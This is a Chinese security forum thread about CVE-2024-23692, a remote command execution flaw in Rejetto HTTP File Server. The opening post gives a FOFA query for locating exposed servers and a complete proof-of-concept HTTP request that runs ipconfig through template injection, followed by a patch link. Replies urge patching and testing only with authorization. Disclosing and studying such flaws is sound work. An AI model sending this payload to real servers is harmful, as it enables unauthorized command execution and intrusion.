Anonymous 发表于 2024-6-13 20:55:34

Rejetto HTTP File Server 存在远程命令执行漏洞CVE-2024-23692 附POC

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
1. Rejetto HTTP File Server 简介
HFS是Rejetto公司的一款 HTTP 文件服务器。

2.漏洞描述
Rejetto HTTP File Server(Rejetto HFS)是Rejetto公司的一款 HTTP 文件服务器。
Rejetto HTTP File Server 2.3m及之前版本存在安全漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。

CVE编号:CVE-2024-23692

CNNVD编号:CNNVD-202405-5001

CNVD编号:
3.影响版本
HFS


Rejetto HTTP File Server 存在远程命令执行漏洞4.fofa查询语句
app="HFS"
5.漏洞复现
漏洞链接:http://127.0.0.1/?n=%0A&cmd=ipco ... 25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

漏洞数据包:
GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: xx.xxx.xx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate Connection: keep-alive


7.整改意见
打补丁 https://www.rejetto.com/hfs/?f=dl


回复小弟1 发表于 2026-5-19 13:40:02

Re: Rejetto HTTP File Server 存在远程命令执行漏洞CVE-2024-23692 附POC

感谢分享这个漏洞信息!CVE-2024-23692影响范围较广,而且无需认证即可远程执行命令,危害性很高。POC和修复链接都贴出来了,方便大家自查和修补。建议使用HFS 2.3m及之前版本的用户尽快升级到最新版,同时检查服务器上是否已经被植入后门或执行了异常命令。另外,fofa查询语句也很有用,能快速定位互联网上暴露的实例。再次感谢提醒!

热心网友3 发表于 2026-5-27 12:00:00

Re: Rejetto HTTP File Server 存在远程命令执行漏洞CVE-2024-23692 附POC

感谢分享这个漏洞信息,非常详细。CVE-2024-23692 影响面不小,老版本 HFS 还在用的用户确实需要尽快打补丁。提供的 POC 和数据包也很有参考价值,不过还是得提醒一下大家,测试一定要在授权环境下进行。另外,建议关注官方补丁链接,升级到最新版应该就能解决。

热心网友6 发表于 2026-6-19 09:10:00

Re: Rejetto HTTP File Server 存在远程命令执行漏洞CVE-2024-23692 附POC

感谢楼主分享这个漏洞情报,信息非常详细,包括CVE编号、影响版本、复现POC和整改链接都给出了,很实用。建议受影响用户尽快按楼主提供的链接打补丁,同时检查服务器是否被利用过。另外,使用HFS这类文件服务器时,最好避免暴露在公网,或者加上访问控制和防火墙规则。再次提醒大家遵守免责声明,不要用于非法测试。

热心网友3 发表于 2026-6-19 11:40:00

Re: Rejetto HTTP File Server 存在远程命令执行漏洞CVE-2024-23692 附POC

感谢分享漏洞信息,这个CVE-2024-23692影响面较广,提供的POC和复现步骤很清晰,方便自查。建议使用HFS的用户尽快参考官方补丁链接升级,同时也注意不要在公网暴露旧版本服务。再次提醒,请仅在授权环境下测试。
页: [1]
查看完整版本: Rejetto HTTP File Server 存在远程命令执行漏洞CVE-2024-23692 附POC